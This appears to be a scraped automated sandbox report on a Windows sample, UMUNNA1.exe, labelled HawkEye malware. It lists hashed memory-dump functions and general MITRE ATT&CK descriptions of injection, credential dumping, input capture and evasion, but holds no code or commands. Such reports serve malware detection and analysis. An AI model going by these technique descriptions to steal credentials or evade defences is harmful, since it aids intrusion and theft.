Source File: 00000004.00000002.923606033.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca96fb8bf505d9c3d1b6dccd97972250870556df81d58a73a66f38399baa7d6c
Instruction ID: c8835563503c8268a048270efccc74643ebbf3ea0f570a8221be2627db33797e
Opcode Fuzzy Hash: ca96fb8bf505d9c3d1b6dccd97972250870556df81d58a73a66f38399baa7d6c
Instruction Fuzzy Hash: B4511574E05208DFDB18DFA6D5806EDBBB2FF89304F24842AD405AB355EB359942CF94

Uniqueness

Uniqueness Score: -1.00%

Function 04CB44A0, Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.923606033.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cd49a28aec1149c3b9d0eac1bd9be37a2ce0ad3122568867f8bc9a0c1c0d1c3
Instruction ID: 42cbbb1578d8361723c1733988c9f70e0ea265c7b16f96bca2a21ba6eac87b2c
Opcode Fuzzy Hash: 2cd49a28aec1149c3b9d0eac1bd9be37a2ce0ad3122568867f8bc9a0c1c0d1c3
Instruction Fuzzy Hash: F451C2B0E04708CFDB18DFAAD5846EDBBF2AF89314F24842AD405AB358DB749985CF54

Uniqueness

Uniqueness Score: -1.00%

Function 04CB02D0, Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.923606033.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2db4c16819f1ba315f00db014592da17a9bd9c606105c7cb9a9c701d2bf3d18
Instruction ID: 44fcc4fff32b3a69a7d1314d5789ba356ed5039d81810dcc6517b45c0c666a6e
Opcode Fuzzy Hash: a2db4c16819f1ba315f00db014592da17a9bd9c606105c7cb9a9c701d2bf3d18
Instruction Fuzzy Hash: 5A418DB8A00208DFDB10DFA9C484BAEBBF1AF0D350F144495E542AB360D735AA50DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 04CB4080, Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.923606033.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4885dee90d606201ac440e10545106080703130c4b6568d6360f9f64944cefd
Instruction ID: 17a881db0cef979c33e8aa8aeb2edf7bd1677e22a84b7404d360fef6afd56540
Opcode Fuzzy Hash: f4885dee90d606201ac440e10545106080703130c4b6568d6360f9f64944cefd
Instruction Fuzzy Hash: F451AC78E052088FCB08EFA9D58499DBBF2FF49301F2080A9E805AB365DB31AD55CF15

Uniqueness

Uniqueness Score: -1.00%

Function 04CB4090, Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.923606033.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44d3fc958ab7ee2a2b01469647f294b2f9f04d063efce52668ed78db14dbd9ab
Instruction ID: c554caf4de9d6b0e8fa9bd7fd5c1e2fc914ddcb2a7ccf91bd7f17b348cb73141
Opcode Fuzzy Hash: 44d3fc958ab7ee2a2b01469647f294b2f9f04d063efce52668ed78db14dbd9ab
Instruction Fuzzy Hash: C4416978E002088FCB08EFA9D58499DBBF2FF49301F2080A9E815AB365DB31AD55CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0281075C, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.921288371.0000000002810000.00000040.00000040.sdmp, Offset: 02810000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24d0d9a6b3428fa7b142ed48449f3368e172df4c9f9583080e894b03f41d5b6c
Instruction ID: 72ca7dae1024dbc1de80dcb9ed479f6ae956a886adf9847eee9bdae0c3844c92
Opcode Fuzzy Hash: 24d0d9a6b3428fa7b142ed48449f3368e172df4c9f9583080e894b03f41d5b6c
Instruction Fuzzy Hash: 8A119038204244DFD315CB14CD84B26BB99AF48708F24C9ACE9498B692C77BD843CA51

Uniqueness

Uniqueness Score: -1.00%

Function 02810724, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.921288371.0000000002810000.00000040.00000040.sdmp, Offset: 02810000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f2d98882714c3b18b05fcbd89da11fa3617e9882b1839dd7e1aeb59647aec78
Instruction ID: 1acbf9c7fa68b6ac38794d5c2bc4e7fd1baa8798ca56bb89d9ccfb66c61e0710
Opcode Fuzzy Hash: 2f2d98882714c3b18b05fcbd89da11fa3617e9882b1839dd7e1aeb59647aec78
Instruction Fuzzy Hash: 77213E395093C49FD703CB20C990B55BFB1AF47304F29C5DAD8899B6A3D33A8846CB51

Uniqueness

Uniqueness Score: -1.00%

Function 04CB0148, Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.923606033.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3825b14e4b0595979dab46f3e2f5d68d45555be8d654b41bff1ea149873de37
Instruction ID: 148bdb25f68fdc498ee943bbb7d3710efa0e60179b24e87935942b0ea3b6afbf
Opcode Fuzzy Hash: b3825b14e4b0595979dab46f3e2f5d68d45555be8d654b41bff1ea149873de37
Instruction Fuzzy Hash: 2E21083094120ADFCB04EFA8E9595ED7B71FB45305F10426AE40597399EF70DE48DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 04CB9CCA, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.923606033.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4193e2335c40b7bf890e8228f05884a25d596fa3f4ea9ceb5844b95c9b1e1f2
Instruction ID: 58fa424dc64d5de9c2b6ddb2efb0738118b8f7de002a62da64a0c9657b83ba16
Opcode Fuzzy Hash: f4193e2335c40b7bf890e8228f05884a25d596fa3f4ea9ceb5844b95c9b1e1f2
Instruction Fuzzy Hash: 1E1115B5D052189EEB14DFBAE8447EEBFF5AF88310F14952AD104F2290E3740644CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 04CB4AF0, Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.923606033.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de1fe538849966b705fc3fdb244198b0b93d5bb1a2590fa10df3c3dfa29eb814
Instruction ID: 08329fd450f3d16b7abeb1a9d659b629c452524f12df8a224a9e15dffec1ac3e
Opcode Fuzzy Hash: de1fe538849966b705fc3fdb244198b0b93d5bb1a2590fa10df3c3dfa29eb814
Instruction Fuzzy Hash: A8019370E052089FCB48DFBAD9456EEFBF6AB89310F20902AD508F3254E7315945CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 028105CF, Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.921288371.0000000002810000.00000040.00000040.sdmp, Offset: 02810000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2406f827c1c191a14e14f100e93f2c46a2edd8c248dc34d1bc2243509133809
Instruction ID: 25887f9b615ec40799d0eaf44b09f8b9fe6f5294661aa63ef34170be95a94bac
Opcode Fuzzy Hash: c2406f827c1c191a14e14f100e93f2c46a2edd8c248dc34d1bc2243509133809
Instruction Fuzzy Hash: 6C01A2B650D7806FD7128B169C51863FFB8EF86630718C49FEC898B612D225A908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 04CB43F0, Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.923606033.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d5e066e012233c45ff6d45b0f3984b4e2995e410e3add651f611414b5186ee2
Instruction ID: 7387d4e269061cf0c057e34b1eda7de20988bbd6c3eb69fa68b756824b50b146
Opcode Fuzzy Hash: 1d5e066e012233c45ff6d45b0f3984b4e2995e410e3add651f611414b5186ee2
Instruction Fuzzy Hash: 00111874E05209DFCB09DFB5D5405ADBBB2FB49304F208569D5016B394DB39AA41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04CB00B0, Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.923606033.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4aa72acb9eff959cb006eae7b9f06076c2c2470c5dd536108f3f5182450037f8
Instruction ID: ec67a356d89d9c2459de1e6d729f2c5caf876fed55a5279490758ff6a795aed6
Opcode Fuzzy Hash: 4aa72acb9eff959cb006eae7b9f06076c2c2470c5dd536108f3f5182450037f8
Instruction Fuzzy Hash: E3F04970D512499FE7199FAAC8497FFBFF6AB49310F108829D040F3250DA7469448BE5

Uniqueness

Uniqueness Score: -1.00%

Function 04CB0448, Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.923606033.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ed997f864cf97a787bd847118ef4f81d4766b1e84890c18b04568ba2a9e7484
Instruction ID: a16207ef2db7201a8730244bcf429dbf757a8ae1057eb646e24e068ccecc5174
Opcode Fuzzy Hash: 2ed997f864cf97a787bd847118ef4f81d4766b1e84890c18b04568ba2a9e7484
Instruction Fuzzy Hash: 7FF06230906208DFCB28DF70C504A6F7376EF86315F2158AC900623750CB76DF41DA55

Uniqueness

Uniqueness Score: -1.00%

Function 04CB76E0, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.923606033.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa48e47893079a36f34faaa89ddfb9468f7f52fbae0e97d1982ebe16c6d89e8d
Instruction ID: 47e9483f1054c13a27352d8e83c2f856ddd6c218d47aeae567792b8cab5b2a09
Opcode Fuzzy Hash: aa48e47893079a36f34faaa89ddfb9468f7f52fbae0e97d1982ebe16c6d89e8d
Instruction Fuzzy Hash: C7F069B0C0A288AFDB02EBB488549BEBFB1EF46204F5445DED840A3352E6315A04CF52

Uniqueness

Uniqueness Score: -1.00%

Function 04CB00C0, Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.923606033.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 485bd968f9fdb4c667f02ef1a06ec909f5efe8490ba40574365e2f9bb19aeede
Instruction ID: f3e505e5693b04f0dc1b3ed1f45306daed7917af5b75462def1d2a2ea58af992
Opcode Fuzzy Hash: 485bd968f9fdb4c667f02ef1a06ec909f5efe8490ba40574365e2f9bb19aeede
Instruction Fuzzy Hash: E9F08270D512099BDB189F6AC8557FFBFF5AB09314F10582DD001B3340DA7469408BE5

Uniqueness

Uniqueness Score: -1.00%

Function 02810818, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.921288371.0000000002810000.00000040.00000040.sdmp, Offset: 02810000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8388fa57679453dc7b04d871bb3dcfd317d9f8cb342853e5fed44ee7779b5e3e
Instruction ID: b3fd1b1c3aa0600c31b5c24aaf2a85c507c009d13cecb4a4540ec07252359316
Opcode Fuzzy Hash: 8388fa57679453dc7b04d871bb3dcfd317d9f8cb342853e5fed44ee7779b5e3e
Instruction Fuzzy Hash: F2F0FB39108644DFC306CF40D940B25FBA6EB89718F24CAA9E9494B752C337D853DA81

Uniqueness

Uniqueness Score: -1.00%

Function 04CB0798, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.923606033.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c41a03617f3475c194d8758fc3096361671db5e12aa26825f16c113f335f858d
Instruction ID: f584ec112b2e56a8bd5f8fb0329b293c68c32141054318e5bf113b46df6075ac
Opcode Fuzzy Hash: c41a03617f3475c194d8758fc3096361671db5e12aa26825f16c113f335f858d
Instruction Fuzzy Hash: F7F0A03490A388CFDB06DBBA95405EDFFB1AF06300F1482EEC884E3652E2745A05EF61

Uniqueness

Uniqueness Score: -1.00%

Function 028105F6, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.921288371.0000000002810000.00000040.00000040.sdmp, Offset: 02810000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7967daa0649a6643f787756bf350900bf01f4e268ef79ea3481c925d6365318
Instruction ID: c03ef269663608dd966b75f1982f14eccc644325aae259d3bb6f236f345cc85e
Opcode Fuzzy Hash: e7967daa0649a6643f787756bf350900bf01f4e268ef79ea3481c925d6365318
Instruction Fuzzy Hash: A5E092B66047005BD650DF0AEC41462FBE8EB84630718C07FDC0D8B711E635F504CEA5

Uniqueness

Uniqueness Score: -1.00%

Function 04CB76F0, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.923606033.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39b62b0592efc27da5f39f850c632863f85afdd0e9f41b0e3a25c844a9286e9a
Instruction ID: 6dd1b304f88299710765c3f3eb3b1b4140f78bc49dd66ba64fe1798295222028
Opcode Fuzzy Hash: 39b62b0592efc27da5f39f850c632863f85afdd0e9f41b0e3a25c844a9286e9a
Instruction Fuzzy Hash: E4F0A574D01208EFCB05EFA8C945AAEBBB5FF45700F5055AAE814A3351EB71AE10CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04CB0748, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.923606033.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d0f8c9247642c3667a54277a6346f27ce4c3a160a6beb9e8b7be1635ffaa78b
Instruction ID: fc7ecc5e3089b06cd3ecd7b3ad06ec23fe35f9e42f0a2b4e6118b725beb4de9a
Opcode Fuzzy Hash: 8d0f8c9247642c3667a54277a6346f27ce4c3a160a6beb9e8b7be1635ffaa78b
Instruction Fuzzy Hash: 8FF0FB74C02308EBCB04EFB8D5085AEBBB1FB05301F2049AAC810A3310DB31AA40CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 04CB0280, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.923606033.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a984bd77415008120f5f8bde504c5c586d28e96680cadfef296e0f7c8fcb9c9c
Instruction ID: b0d326d5053c7832ad18279a3cb357f7d6cb5b56a6375f34881274817435f4bb
Opcode Fuzzy Hash: a984bd77415008120f5f8bde504c5c586d28e96680cadfef296e0f7c8fcb9c9c
Instruction Fuzzy Hash: 3FE04F34905309DFCB18DFA9D6455ADBBB5AB45301F1041BAD84493350E730AE44DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00CB23F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.920811414.0000000000CB2000.00000040.00000001.sdmp, Offset: 00CB2000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb126c806a1c3d137c3f0c75f0da41a8f7f0e308f713e16e09a3e709c108ab93
Instruction ID: bf2f7f8ce03ce67315f038ab9e406f1022c56874bf51045962e00e40318c2555
Opcode Fuzzy Hash: bb126c806a1c3d137c3f0c75f0da41a8f7f0e308f713e16e09a3e709c108ab93
Instruction Fuzzy Hash: 28D05E79245A914FD3268A1CC1A8BD53FD4AF51B05F4644F9E8008BA67C369DB81E600

Uniqueness

Uniqueness Score: -1.00%

Function 00CB23BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.920811414.0000000000CB2000.00000040.00000001.sdmp, Offset: 00CB2000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40808991b1cff5a9455f024fb209b46b9cccdcf8d46bf2c942b37f7b17ec8341
Instruction ID: 33dd0547d6afd78e33c1a6b2fb939f2b851703a58bd4707beae4579159eee2e6
Opcode Fuzzy Hash: 40808991b1cff5a9455f024fb209b46b9cccdcf8d46bf2c942b37f7b17ec8341
Instruction Fuzzy Hash: E6D05E342002814BC715DB0CC194F9937D8AB41B00F0644E8AC108B276C7A8DDC1C600

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	File monitoring, Process command-line parameters
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report UMUNNA1.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: HawkEye

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
